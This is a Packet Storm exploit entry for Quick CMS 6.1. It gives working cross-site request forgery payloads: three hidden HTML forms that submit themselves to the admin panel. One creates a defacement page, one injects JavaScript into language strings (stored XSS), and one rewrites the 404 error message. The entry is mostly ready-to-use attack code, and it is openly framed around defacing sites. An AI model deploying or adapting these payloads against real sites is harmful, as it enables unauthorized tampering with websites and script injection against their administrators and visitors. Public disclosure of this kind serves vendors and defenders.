Quick CMS 6.1 Cross Site Request Forgery / Cross Site Scripting

2016-01-21T00:00:00
ID PACKETSTORM:135348
Type packetstorm
Reporter Amir.ght
Modified 2016-01-21T00:00:00

Description

                                        
                                            `-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit Title : Quick CMS CSRF/XSS  
-# Vendor Homepage: http://opensolution.org  
-# Software Link:  
-# http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip  
-# Version : 6.1  
-# Date: 2016-21-01  
-# Tested On : Windows 7 / FireFox  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit For Create a Deface Page  
-# [Text] Is Your Deface Message  
-# Path Of page is : http://target.com/?(X)  
-# Exploit Code:  
<form name="addpage" method="POST"  
action="http://[URL]/admin.php?p=pages-form" />  
<input type="hidden" name="sName" value="Title Of Page" />  
<input type="hidden" name="sDescriptionFull" value="[Text]" />  
<input type="hidden" name="iStatus" value="1" />  
<input type="hidden" name="sUrl" value="(X)" />  
<input type="hidden" name="iPosition" value="0" />  
<input type="hidden" name="iMenu" value="1" />  
<input type="hidden" name="iTheme" value="1" />  
<input type="hidden" name="sOption" value="save" />  
</form>  
<script language="javascript">  
setTimeout('addpage.submit()',1);  
</script>  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit for XSS/Csrf :  
<form name="xss" method="POST"  
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />  
<input type="hidden" name="Pages"  
value="Pages<script>alert(/xss/)</script>" /> is Your js Code  
<input type="hidden" name="sOption" value="save" />  
</form>  
<script language="javascript">  
setTimeout('xss.submit()',1);  
</script>  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit for Edit Error 404 :  
<form name="notfound" method="POST"  
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />  
<input type="hidden" name="404_error" value="title+of+page" />  
<input type="hidden" name="Data_not_found" value="deface+message" />  
<input type="hidden" name="sOption" value="save" />  
</form>  
<script language="javascript">  
setTimeout('notfound.submit()',1);  
</script>  
------------------------------------------  
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
#-# Discovered by : Amir.ght -#-#  
#-# Author : Ashiyane Digital Security Team -#-#  
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
`